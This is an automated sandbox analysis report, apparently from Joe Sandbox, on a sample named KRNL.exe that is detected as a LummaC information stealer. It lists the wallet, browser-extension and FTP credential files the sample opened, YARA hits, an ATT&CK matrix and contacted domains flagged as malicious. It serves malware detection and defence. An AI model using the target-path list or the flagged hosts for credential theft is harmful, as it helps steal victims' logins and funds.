                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
                    Source: Yara matchFile source: 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.KRNL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.KRNL.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		Boot or Logon Initialization Scripts211
                    Process Injection                    		3
                    Obfuscated Files or Information                    		LSASS Memory12
                    File and Directory Discovery                    		Remote Desktop Protocol41
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		Logon Script (Windows)Logon Script (Windows)1
                    Software Packing                    		Security Account Manager33
                    System Information Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading                    		NTDS1
                    Query Registry                    		Distributed Component Object Model3
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
                    Virtualization/Sandbox Evasion                    		LSA Secrets241
                    Security Software Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                    Process Injection                    		Cached Domain Credentials21
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    KRNL.exe40%VirustotalBrowse
                    KRNL.exe68%ReversingLabsWin32.Trojan.LummaC
                    KRNL.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://steambroadcast-test.akamaizedk0%Avira URL Cloudsafe
                    https://lev-tolstoi.com/k100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/apiul100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/pi#100%Avira URL Cloudmalware
                    https://login.steampK0%Avira URL Cloudsafe
                    https://help.st0%Avira URL Cloudsafe
                    https://lev-tolstoi.com/m/S100%Avira URL Cloudmalware
                    https://checkout.steampow0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		104.102.49.254
                    		truefalse
                      		high
                      lev-tolstoi.com
                      		172.67.157.254
                      		truefalse
                        		high
                        cashfuzysao.buzz
                        		unknown
                        		unknownfalse
                          		high
                          scentniej.buzz
                          		unknown
                          		unknownfalse
                            		high
                            inherineau.buzz
                            		unknown
                            		unknownfalse
                              		high
                              prisonyfork.buzz
                              		unknown
                              		unknownfalse
                                		high
                                206.23.85.13.in-addr.arpa
                                		unknown
                                		unknownfalse
                                  		high
                                  rebuildeso.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    appliacnesot.buzz
                                    		unknown
                                    		unknownfalse
                                      		high
                                      hummskitnj.buzz
                                      		unknown
                                      		unknownfalse
                                        		high
                                        mindhandru.buzz
                                        		unknown
                                        		unknownfalse
                                          		high
                                          screwamusresz.buzz
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            scentniej.buzzfalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                rebuildeso.buzzfalse
                                                  		high
                                                  appliacnesot.buzzfalse
                                                    		high
                                                    screwamusresz.buzzfalse
                                                      		high
                                                      cashfuzysao.buzzfalse
                                                        		high
                                                        inherineau.buzzfalse
                                                          		high
                                                          https://lev-tolstoi.com/apifalse
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/chrome_newtabKRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://player.vimeo.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://duckduckgo.com/ac/?q=KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://steamcommunity.com/?subsection=broadcastsKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://lev-tolstoi.com/sKRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1751845531.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://store.steampowered.com/subscriber_agreement/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.gstatic.cn/recaptcha/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://cdn.fastly.KRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://steambroadcast-test.akamaizedkKRNL.exe, 00000002.00000003.1699717842.0000000003383000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.valvesoftware.com/legal.htmKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.youtube.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiKRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackKRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://lev-tolstoi.com/kKRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976733332.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englKRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://s.ytimg.com;KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://steam.tv/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94KRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.entrust.net/rpa03KRNL.exefalse
                                                                                                                          		high
                                                                                                                          https://lev-tolstoi.com/KRNL.exe, 00000002.00000002.2915949204.00000000033E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://store.steampowered.com/privacy_agreement/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710324005.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lev-tolstoi.com/m/SKRNL.exe, 00000002.00000003.1699633987.0000000003342000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              		unknown
                                                                                                                              https://store.steampowered.com/points/shop/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaKRNL.exe, 00000002.00000003.1738159372.0000000005A44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:KRNL.exe, 00000002.00000003.1737060730.0000000005A76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://lev-tolstoi.com/pi#KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821721499.00000000033CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                        		unknown
                                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016KRNL.exe, 00000002.00000003.1723581632.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712083330.0000000005A9F000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1712222118.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1723494603.0000000005A98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sketchfab.comKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.ecosia.org/newtab/KRNL.exe, 00000002.00000003.1711060415.0000000005A8C000.00000004.00000800.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1711461120.0000000005A89000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lv.queniujq.cnKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699633987.000000000333A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brKRNL.exe, 00000002.00000003.1737899780.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.youtube.com/KRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1710350446.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690264373.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://store.steampowered.com/privacy_agreement/KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://support.microsofKRNL.exe, 00000002.00000003.1712083330.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amKRNL.exe, 00000002.00000003.1690235008.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1699605747.00000000033D4000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1690235008.00000000033CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
